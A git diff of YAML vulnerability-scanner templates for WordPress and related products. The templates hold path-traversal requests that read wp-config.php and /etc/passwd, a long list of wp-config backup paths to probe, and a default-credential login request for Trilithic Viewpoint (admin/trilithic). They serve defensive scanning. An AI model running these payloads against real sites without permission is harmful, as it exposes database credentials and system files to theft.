@@ -1,23 +1,28 @@
id: nativechurch-wp-theme-lfd
+
info:
- name: WordPress NativeChurch Theme Arbitrary File Download
+ name: WordPress NativeChurch Theme - Local File Inclusion
author: 0x_Akoko
severity: high
+ description: WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
+ reference:
+ - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
tags: wordpress,wp-theme,lfi
- description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable.
- reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
+
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'
+
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
+ - "DB_HOST"
+ - "The base configurations of the WordPress"
part: body
condition: and
- - type: status
- status:
- - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/poc/wordpress/nativechurch-wp-theme-lfd.yaml b/poc/wordpress/nativechurch-wp-theme-lfd.yaml
new file mode 100644
index 0000000000..8f360aab74
--- /dev/null
+++ b/poc/wordpress/nativechurch-wp-theme-lfd.yaml
@@ -0,0 +1,25 @@
+id: nativechurch-wp-theme-lfd
+info:
+ name: WordPress NativeChurch Theme - Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ description: WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
+ reference:
+ - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
+ tags: wordpress,wp-theme,lfi
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ - "DB_HOST"
+ - "The base configurations of the WordPress"
+ part: body
+ condition: and
+
+# Enhanced by mp on 2022/07/29
diff --git a/poc/wordpress/skyline-wp-1095b08570fd71d7f3c066aaeb5a9c18.yaml b/poc/wordpress/skyline-wp-1095b08570fd71d7f3c066aaeb5a9c18.yaml
new file mode 100644
index 0000000000..135ccfe3a3
--- /dev/null
+++ b/poc/wordpress/skyline-wp-1095b08570fd71d7f3c066aaeb5a9c18.yaml
@@ -0,0 +1,59 @@
+id: skyline-wp-1095b08570fd71d7f3c066aaeb5a9c18
+
+info:
+ name: >
+ Extend Themes <= (Multiple Versions) - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dcb0334c-d5eb-40b9-be7c-42857dedc96d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/skyline-wp/"
+ google-query: inurl:"/wp-content/themes/skyline-wp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,skyline-wp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/skyline-wp/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "skyline-wp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.10')
\ No newline at end of file
diff --git a/poc/wordpress/trilithic-viewpoint-default.yaml b/poc/wordpress/trilithic-viewpoint-default.yaml
index 6cd0fc44e6..d26dd6f456 100644
--- a/poc/wordpress/trilithic-viewpoint-default.yaml
+++ b/poc/wordpress/trilithic-viewpoint-default.yaml
@@ -1,7 +1,7 @@
id: trilithic-viewpoint-default
info:
- name: Trilithic Viewpoint Default Credentials
+ name: Trilithic Viewpoint Default Login
author: davidmckennirey
severity: high
description: |
@@ -13,11 +13,17 @@ requests:
- |
POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1
Host: {{Hostname}}
- Content-Length: 65
Content-Type: application/json
Cookie: trilithic_win_auth=false
- {u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false}
+ {u:"{{username}}", t:"undefined", p:"{{password}}", d:"", r:false, w:false}
+
+ payloads:
+ username:
+ - admin
+ password:
+ - trilithic
+ attack: pitchfork
matchers-condition: and
matchers:
diff --git a/poc/wordpress/trilithic-viewpoint-login-10839.yaml b/poc/wordpress/trilithic-viewpoint-login-10839.yaml
index 9799ef6814..953095f4f0 100644
--- a/poc/wordpress/trilithic-viewpoint-login-10839.yaml
+++ b/poc/wordpress/trilithic-viewpoint-login-10839.yaml
@@ -4,12 +4,11 @@ info:
author: davidmckennirey
severity: high
description: Trilithic Viewpoint application default admin credentials were discovered. Note this product has been discontinued.
- tags: default-login,trilithic,viewpoint
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
- cve-id:
cwe-id: CWE-522
+ tags: default-login,trilithic,viewpoint
requests:
- raw:
- |
diff --git a/poc/wordpress/viewpoint-system-status-11016.yaml b/poc/wordpress/viewpoint-system-status-11016.yaml
new file mode 100644
index 0000000000..dde15825c5
--- /dev/null
+++ b/poc/wordpress/viewpoint-system-status-11016.yaml
@@ -0,0 +1,19 @@
+id: viewpoint-system-status
+info:
+ name: ViewPoint System Status
+ author: dhiyaneshDK
+ severity: low
+ reference: https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22
+ tags: status,exposures,viewpoint
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'ViewPoint System Status'
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/viewpoint-system-status.yaml b/poc/wordpress/viewpoint-system-status.yaml
index 96d6ae5dbb..7d0e87a274 100644
--- a/poc/wordpress/viewpoint-system-status.yaml
+++ b/poc/wordpress/viewpoint-system-status.yaml
@@ -5,11 +5,10 @@ info:
author: dhiyaneshDK
severity: low
metadata:
- max-request: 1
shodan-query: http.title:"ViewPoint System Status"
- tags: status,exposure,viewpoint,misconfig
+ tags: status,exposures,viewpoint
-http:
+requests:
- method: GET
path:
- '{{BaseURL}}'
@@ -23,5 +22,3 @@ http:
- type: status
status:
- 200
-
-# digest: 490a00463044022046ac5179a0bfec6775df4791656267016cc1c439e199c6d9f6d88a1e3e8d04bf02200bbf452556dbc7f0d5efbe01fdca78a4a3d4351614674ff1454f7d6db2f8f075:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-LFI.yaml b/poc/wordpress/wordpress-LFI.yaml
index aea478a3f7..f4bde03529 100644
--- a/poc/wordpress/wordpress-LFI.yaml
+++ b/poc/wordpress/wordpress-LFI.yaml
@@ -1,8 +1,10 @@
id: wordpress-LFI
+
info:
name: wordpress-LFI
author: 0x240x23elu
severity: High
+
requests:
- method: GET
path:
@@ -14,8 +16,10 @@ requests:
- "{{BaseURL}}/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00"
- "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
+
+
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
- part: body
+ part: body
\ No newline at end of file
diff --git a/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml b/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml
index f7c496190b..0f27ba5f37 100644
--- a/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml
+++ b/poc/wordpress/wordpress-accessible-wpconfig-11238.yaml
@@ -1,11 +1,19 @@
id: wordpress-accessible-wpconfig
+
info:
- name: WordPress accessible wp-config
- author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
- severity: high
- description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
+ name: WordPress wp-config Detection
+ author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess,0xpugazh
+ severity: medium
+ description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cwe-id: CWE-200
+ metadata:
+ max-request: 30
tags: wordpress,backup
-requests:
+
+http:
- method: GET
path:
- '{{BaseURL}}/wp-config.php'
@@ -16,20 +24,32 @@ requests:
- '{{BaseURL}}/wp-config.txt'
- '{{BaseURL}}/wp-config.php.txt'
- '{{BaseURL}}/wp-config.php.bak'
+ - '{{BaseURL}}/wp-config.php.BAK'
- '{{BaseURL}}/wp-config.php.old'
+ - '{{BaseURL}}/wp-config.php.OLD'
- '{{BaseURL}}/wp-config.php.dist'
- '{{BaseURL}}/wp-config.php.inc'
- '{{BaseURL}}/wp-config.php.swp'
- '{{BaseURL}}/wp-config.php.html'
- '{{BaseURL}}/wp-config-backup.txt'
- '{{BaseURL}}/wp-config.php.save'
+ - '{{BaseURL}}/wp-config.php.SAVE'
- '{{BaseURL}}/wp-config.php~'
- '{{BaseURL}}/wp-config.php-backup'
- '{{BaseURL}}/wp-config.php.orig'
+ - '{{BaseURL}}/wp-config.php_orig'
- '{{BaseURL}}/wp-config.php.original'
+ - '{{BaseURL}}/wp-config.backup'
- '{{BaseURL}}/_wpeprivate/config.json'
+ - '{{BaseURL}}/config.php.zip'
+ - '{{BaseURL}}/config.php.tar.gz'
+ - '{{BaseURL}}/config.php.new'
+ - '{{BaseURL}}/common/config.php.new'
+ - '{{BaseURL}}/wp-config.php.bk'
+
stop-at-first-match: true
- matchers-condition: and
+
+ matchers-condition: or
matchers:
- type: word
words:
@@ -37,6 +57,12 @@ requests:
- "DB_PASSWORD"
part: body
condition: and
- - type: status
- status:
- - 200
+
+ - type: word
+ part: body
+ words:
+ - "DBNAME"
+ - "PASSWORD"
+ condition: and
+
+# digest: 4b0a00483046022100f88f704a2270d5d54e06c42cfc035f9104301d9940f38771a55b0e4953384865022100e7453447cdf3813db80dc184271aa25b98a984fba38ddd9d7d4da1dd49575379:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-accessible-wpconfig-11239.yaml b/poc/wordpress/wordpress-accessible-wpconfig-11239.yaml
index c6cdd244de..4278ee20f0 100644
--- a/poc/wordpress/wordpress-accessible-wpconfig-11239.yaml
+++ b/poc/wordpress/wordpress-accessible-wpconfig-11239.yaml
@@ -1,9 +1,14 @@
id: wordpress-accessible-wpconfig
info:
- name: WordPress accessible wp-config
- author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo
- severity: high
- tags: wordpress,backups
+ name: WordPress wp-config Detection
+ author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
+ severity: medium
+ description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading.
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cwe-id: CWE-200
+ tags: wordpress,backup
requests:
- method: GET
path:
@@ -23,16 +28,21 @@ requests:
- '{{BaseURL}}/wp-config-backup.txt'
- '{{BaseURL}}/wp-config.php.save'
- '{{BaseURL}}/wp-config.php~'
+ - '{{BaseURL}}/wp-config.php-backup'
- '{{BaseURL}}/wp-config.php.orig'
- '{{BaseURL}}/wp-config.php.original'
- '{{BaseURL}}/_wpeprivate/config.json'
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- - DB_NAME
- - WPENGINE_ACCOUNT
+ - "DB_NAME"
+ - "DB_PASSWORD"
part: body
+ condition: and
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/04/12
diff --git a/poc/wordpress/wordpress-affiliatewp-log-11240.yaml b/poc/wordpress/wordpress-affiliatewp-log-11240.yaml
index ecacdbc600..6c7366d644 100644
--- a/poc/wordpress/wordpress-affiliatewp-log-11240.yaml
+++ b/poc/wordpress/wordpress-affiliatewp-log-11240.yaml
@@ -1,6 +1,6 @@
id: wordpress-affiliatewp-log
info:
- name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure
+ name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure
author: dhiyaneshDK
severity: low
tags: wordpress,log,plugin
diff --git a/poc/wordpress/wordpress-affiliatewp-log-11242.yaml b/poc/wordpress/wordpress-affiliatewp-log-11242.yaml
new file mode 100644
index 0000000000..ecacdbc600
--- /dev/null
+++ b/poc/wordpress/wordpress-affiliatewp-log-11242.yaml
@@ -0,0 +1,23 @@
+id: wordpress-affiliatewp-log
+info:
+ name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure
+ author: dhiyaneshDK
+ severity: low
+ tags: wordpress,log,plugin
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/uploads/affwp-debug.log'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Referral could not be retrieved'
+ - 'Affiliate CSV'
+ - type: word
+ words:
+ - 'text/plain'
+ part: header
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wordpress-affiliatewp-log-11243.yaml b/poc/wordpress/wordpress-affiliatewp-log-11243.yaml
deleted file mode 100644
index e41e2cde76..0000000000
--- a/poc/wordpress/wordpress-affiliatewp-log-11243.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: wordpress-affiliatewp-log
-info:
- name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure
- author: dhiyaneshDK
- severity: low
- tags: wordpress,log
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/uploads/affwp-debug.log'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Referral could not be retrieved'
- - 'Affiliate CSV'
- - type: word
- words:
- - 'text/plain'
- part: header
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wordpress-bbpress-plugin-listing.yaml b/poc/wordpress/wordpress-bbpress-plugin-listing.yaml
new file mode 100644
index 0000000000..a392e5f104
--- /dev/null
+++ b/poc/wordpress/wordpress-bbpress-plugin-listing.yaml
@@ -0,0 +1,23 @@
+id: wordpress-bbpress-plugin-listing
+info:
+ name: WordPress bbPress Plugin Directory Listing
+ author: dhiyaneshDK
+ severity: info
+ description: Searches for sensitive directories present in the bbpress wordpress plugin.
+ reference:
+ - https://www.exploit-db.com/ghdb/6158
+ tags: wordpress,listing,plugin
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bbpress/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - "/wp-content/plugins/bbpress/"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wordpress-db-backup-listing-11250.yaml b/poc/wordpress/wordpress-db-backup-listing-11248.yaml
similarity index 100%
rename from poc/wordpress/wordpress-db-backup-listing-11250.yaml
rename to poc/wordpress/wordpress-db-backup-listing-11248.yaml
diff --git a/poc/wordpress/wordpress-db-repair-11252.yaml b/poc/wordpress/wordpress-db-repair-11252.yaml
deleted file mode 100644
index 3b9b5fb05f..0000000000
--- a/poc/wordpress/wordpress-db-repair-11252.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: wordpress-db-repair
-info:
- name: Wordpress DB Repair Exposed
- author: _C0wb0y_
- severity: low
- description: Discover enabled Wordpress repair page.
- tags: wordpress,config,fpd
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-admin/maint/repair.php"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "WordPress"
- - type: word
- words:
- - "define('WP_ALLOW_REPAIR', true);"
- negative: true
diff --git a/poc/wordpress/wordpress-db-repair-11255.yaml b/poc/wordpress/wordpress-db-repair-11255.yaml
new file mode 100644
index 0000000000..6cf8668d0b
--- /dev/null
+++ b/poc/wordpress/wordpress-db-repair-11255.yaml
@@ -0,0 +1,31 @@
+id: wordpress-db-repair
+
+info:
+ name: Wordpress DB Repair Exposed
+ author: _C0wb0y_
+ severity: low
+ description: Discover enabled Wordpress repair page.
+ tags: wordpress,config,fpd
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/maint/repair.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "<title>WordPress"
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "define"
+ - "WP_ALLOW_REPAIR"
+ - "true"
+ condition: and
+ negative: true
diff --git a/poc/wordpress/wordpress-db-repair.yaml b/poc/wordpress/wordpress-db-repair.yaml
index 6cf8668d0b..3b9b5fb05f 100644
--- a/poc/wordpress/wordpress-db-repair.yaml
+++ b/poc/wordpress/wordpress-db-repair.yaml
@@ -1,31 +1,20 @@
id: wordpress-db-repair
-
info:
name: Wordpress DB Repair Exposed
author: _C0wb0y_
severity: low
description: Discover enabled Wordpress repair page.
tags: wordpress,config,fpd
-
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/maint/repair.php"
-
matchers-condition: and
matchers:
- type: word
words:
- "<title>WordPress"
-
- - type: status
- status:
- - 200
-
- type: word
words:
- - "define"
- - "WP_ALLOW_REPAIR"
- - "true"
- condition: and
+ - "define('WP_ALLOW_REPAIR', true);"
negative: true
diff --git a/poc/wordpress/wordpress-debug-log-11256.yaml b/poc/wordpress/wordpress-debug-log-11256.yaml
index dee5e0d057..637d2fd6b0 100644
--- a/poc/wordpress/wordpress-debug-log-11256.yaml
+++ b/poc/wordpress/wordpress-debug-log-11256.yaml
@@ -3,7 +3,7 @@ info:
name: WordPress debug log
author: geraldino2 & @dwisiswant0
severity: low
- tags: wordpress,log
+ tags: wordpress,logs
requests:
- method: GET
path:
diff --git a/poc/wordpress/wordpress-debug-log-11258.yaml b/poc/wordpress/wordpress-debug-log-11258.yaml
deleted file mode 100644
index 8b743b299e..0000000000
--- a/poc/wordpress/wordpress-debug-log-11258.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: wp-debug-log
-info:
- name: WordPress debug log
- author: geraldino2,dwisiswant0
- severity: low
- tags: wordpress,log
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/debug.log"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - octet-stream
- - text/plain
- part: header
- condition: or
- - type: regex
- regex:
- - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP"
- part: body
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wordpress-debug-log-11259.yaml b/poc/wordpress/wordpress-debug-log-11259.yaml
new file mode 100644
index 0000000000..dee5e0d057
--- /dev/null
+++ b/poc/wordpress/wordpress-debug-log-11259.yaml
@@ -0,0 +1,25 @@
+id: wp-debug-log
+info:
+ name: WordPress debug log
+ author: geraldino2 & @dwisiswant0
+ severity: low
+ tags: wordpress,log
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/debug.log"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - octet-stream
+ - text/plain
+ part: header
+ condition: or
+ - type: regex
+ regex:
+ - "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wordpress-debug-log.yaml b/poc/wordpress/wordpress-debug-log.yaml
index bd7b40ae20..8b743b299e 100644
--- a/poc/wordpress/wordpress-debug-log.yaml
+++ b/poc/wordpress/wordpress-debug-log.yaml
@@ -1,18 +1,13 @@
id: wp-debug-log
-
info:
name: WordPress debug log
author: geraldino2,dwisiswant0
severity: low
- metadata:
- max-request: 1
tags: wordpress,log
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/debug.log"
-
matchers-condition: and
matchers:
- type: word
@@ -21,14 +16,10 @@ http:
- text/plain
part: header
condition: or
-
- type: regex
regex:
- "[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP"
part: body
-
- type: status
status:
- 200
-
-# digest: 4b0a0048304602210088508540400171b7789ff615fc799433d70f773a308c8d2e42b180fe62ed400f022100b2b045d2694a75337ccdc3cd7259ecb012a37786663dbeba923b350c1d9ba968:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-detect-11261.yaml b/poc/wordpress/wordpress-detect-11260.yaml
similarity index 100%
rename from poc/wordpress/wordpress-detect-11261.yaml
rename to poc/wordpress/wordpress-detect-11260.yaml
diff --git a/poc/wordpress/wordpress-detect.yaml b/poc/wordpress/wordpress-detect.yaml
index bf419a8314..1bb03114d3 100644
--- a/poc/wordpress/wordpress-detect.yaml
+++ b/poc/wordpress/wordpress-detect.yaml
@@ -1,65 +1,34 @@
id: wordpress-detect
-
info:
- name: WordPress Detect
- author: pdteam,daffainfo,ricardomaia,topscoder,AdamCrosser
+ name: WordPress Detection
+ author: pdteam
severity: info
metadata:
- verified: true
- max-request: 4
- vendor: wordpress
- product: wordpress
shodan-query: http.component:"WordPress"
- category: cms
- tags: tech,wordpress,cms,wp
-
-http:
+ tags: tech,wordpress
+requests:
- method: GET
path:
- "{{BaseURL}}"
- - "{{BaseURL}}/wp-admin/install.php"
- - "{{BaseURL}}/feed/"
- - "{{BaseURL}}/?feed=rss2" # alternative if /feed/ is blocked
-
redirects: true
max-redirects: 2
- stop-at-first-match: true
-
- matchers-condition: and
+ matchers-condition: or
matchers:
- type: regex
regex:
- - '<generator>https?:\/\/wordpress\.org.*</generator>'
- - 'wp-login.php'
- - '\/wp-content/themes\/'
- - '\/wp-includes\/'
- - 'name="generator" content="wordpress'
- '<link[^>]+s\d+\.wp\.com'
- '<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -'
- '<!--[^>]+WP-Super-Cache'
condition: or
-
- - type: status
- status:
- - 200
-
+ - type: word
+ words:
+ - '/wp-content/themes/'
+ - '/wp-includes/'
+ - 'name="generator" content="wordpress'
+ - '<!-- performance optimized by w3 total cache. learn more: http://www.w3-edge.com/wordpress-plugins/'
+ condition: or
extractors:
- type: regex
- name: version_by_generator
- group: 1
- regex:
- - '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)'
-
- - type: regex
- name: version_by_js
- group: 1
- regex:
- - 'wp-emoji-release\.min\.js\?ver=((\d+\.?)+)\b'
-
- - type: regex
- name: version_by_css
group: 1
regex:
- - 'install\.min\.css\?ver=((\d+\.?)+)\b'
-
-# digest: 4a0a00473045022063a1eb3686edc8dfada91893ca54db0bb002e131cca2a373d56b39c69e46b5440221009004f9bb9c3168e5bdacea0aed03100ce640ecaa2afb4bb3b64a3e545ef1fbcb:922c64590222798bb761d5b6d8e72950
+ - 'content="WordPress ([0-9.]+)"'
diff --git a/poc/wordpress/wordpress-directory-listing-11262.yaml b/poc/wordpress/wordpress-directory-listing-11262.yaml
index 0e719cc724..8df3d1a7a2 100644
--- a/poc/wordpress/wordpress-directory-listing-11262.yaml
+++ b/poc/wordpress/wordpress-directory-listing-11262.yaml
@@ -3,10 +3,14 @@ info:
name: Wordpress directory listing
author: Manas_Harsh
severity: info
+ tags: wordpress
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/"
+ - "{{BaseURL}}/wp-content/themes/"
+ - "{{BaseURL}}/wp-content/plugins/"
+ - "{{BaseURL}}/wp-includes/"
matchers-condition: and
matchers:
- type: status
@@ -14,4 +18,4 @@ requests:
- 200
- type: word
words:
- - Index of /wp-content/uploads
+ - "Index of /"
diff --git a/poc/wordpress/wordpress-directory-listing-11265.yaml b/poc/wordpress/wordpress-directory-listing-11265.yaml
index fd0ec7d30e..e29652a4c2 100644
--- a/poc/wordpress/wordpress-directory-listing-11265.yaml
+++ b/poc/wordpress/wordpress-directory-listing-11265.yaml
@@ -4,9 +4,11 @@ info:
name: Wordpress directory listing
author: Manas_Harsh
severity: info
+ metadata:
+ max-request: 4
tags: wordpress
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/"
@@ -23,3 +25,5 @@ requests:
- type: word
words:
- "Index of /"
+
+# digest: 4b0a00483046022100f786a42ed300a52582827e03b543836ef5c7fb473c4a74efa37181fb9ba480ac022100fd7cf2b52c1233109cae77b107e1acc0a4e3c4c08ff97b432f873cab50c647ed:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-directory-listing-11266.yaml b/poc/wordpress/wordpress-directory-listing-11266.yaml
new file mode 100644
index 0000000000..0e719cc724
--- /dev/null
+++ b/poc/wordpress/wordpress-directory-listing-11266.yaml
@@ -0,0 +1,17 @@
+id: wordpress-directory-listing
+info:
+ name: Wordpress directory listing
+ author: Manas_Harsh
+ severity: info
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/uploads/"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - Index of /wp-content/uploads
diff --git a/poc/wordpress/wordpress-elementor-plugin-listing-11267.yaml b/poc/wordpress/wordpress-elementor-plugin-listing-11267.yaml
index 049baa8262..2dd5ba6b76 100644
--- a/poc/wordpress/wordpress-elementor-plugin-listing-11267.yaml
+++ b/poc/wordpress/wordpress-elementor-plugin-listing-11267.yaml
@@ -1,4 +1,5 @@
id: wordpress-elementor-plugin-listing
+
info:
name: WordPress Elementor Plugin Directory Listing
author: dhiyaneshDK
@@ -6,11 +7,15 @@ info:
description: Searches for sensitive directories present in the elementor wordpress plugin.
reference:
- https://www.exploit-db.com/ghdb/6297
- tags: wordpress,listing,plugin
-requests:
+ metadata:
+ max-request: 1
+ tags: listing,plugin,edb,wordpress
+
+http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/elementor/"
+
matchers-condition: and
matchers:
- type: word
@@ -18,6 +23,9 @@ requests:
- "Index of"
- "/wp-content/plugins/elementor/"
condition: and
+
- type: status
status:
- 200
+
+# digest: 490a00463044022055dd8901a71c625f0a18ad4ffb3a44b499165bad3f290475976ac940ae1ee8ea02201b60b514cb42b951b1af0a198cef62b0a7f51db6c0c60636bb9c57488ec3f326:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wordpress-elementor-plugin-listing-11269.yaml b/poc/wordpress/wordpress-elementor-plugin-listing-11269.yaml
new file mode 100644
index 0000000000..049baa8262
--- /dev/null
+++ b/poc/wordpress/wordpress-elementor-plugin-listing-11269.yaml
@@ -0,0 +1,23 @@
+id: wordpress-elementor-plugin-listing
+info:
+ name: WordPress Elementor Plugin Directory Listing
+ author: dhiyaneshDK
+ severity: info
+ description: Searches for sensitive directories present in the elementor wordpress plugin.
+ reference:
+ - https://www.exploit-db.com/ghdb/6297
+ tags: wordpress,listing,plugin
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/elementor/"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Index of"
+ - "/wp-content/plugins/elementor/"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/wordpress/wordpress-emergency-script-11272.yaml b/poc/wordpress/wordpress-emergency-script-11272.yaml
index 40258b1a9d..a7b7f87dc2 100644
--- a/poc/wordpress/wordpress-emergency-script-11272.yaml
+++ b/poc/wordpress/wordpress-emergency-script-11272.yaml
@@ -4,8 +4,7 @@ info:
author: dwisiswant0
severity: info
tags: wordpress
- # Ref:-
- # https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script
+ reference: https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script
requests:
- method: GET
path:
diff --git a/poc/wordpress/wordpress-emergency-script-11276.yaml b/poc/wordpress/wordpress-emergency-script-11275.yaml
similarity index 100%
rename from poc/wordpress/wordpress-emergency-script-11276.yaml
rename to poc/wordpress/wordpress-emergency-script-11275.yaml
diff --git a/poc/wordpress/wordpress-git-config-11278.yaml b/poc/wordpress/wordpress-git-config-11278.yaml
deleted file mode 100644
index 0ade76adee..0000000000
--- a/poc/wordpress/wordpress-git-config-11278.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: wordpress-git-config
-info:
- name: Wordpress Git Config
- author: nerrorsec
- severity: info
- description: Searches for the pattern /.git/config inside themes and plugins folder.
- reference: https://hackerone.com/reports/248693
- tags: config,git,exposure,wordpress,wp-plugin,wp-theme
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/.git/config"
- - "{{BaseURL}}/wp-content/themes/.git/config"
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "[core]"
- - type: dsl
- dsl:
- - "!contains(tolower(body), '<html')"
- - "!contains(tolower(body), '<body')"
- condition: and
- - type: status
- status:
- - 200
diff --git a/poc/wordpress/wordpress-git-config-11279.yaml b/poc/wordpress/wordpress-git-config-11279.yaml
index 2e71493a93..0ade76adee 100644
--- a/poc/wordpress/wordpress-git-config-11279.yaml
+++ b/poc/wordpress/wordpress-git-config-11279.yaml
@@ -1,36 +1,26 @@
id: wordpress-git-config
-
info:
name: Wordpress Git Config
author: nerrorsec
severity: info
description: Searches for the pattern /.git/config inside themes and plugins folder.
- reference:
- - https://hackerone.com/reports/248693
- metadata:
- max-request: 2
- tags: hackerone,config,git,exposure,wordpress,wp-plugin,wp-theme
-
-http:
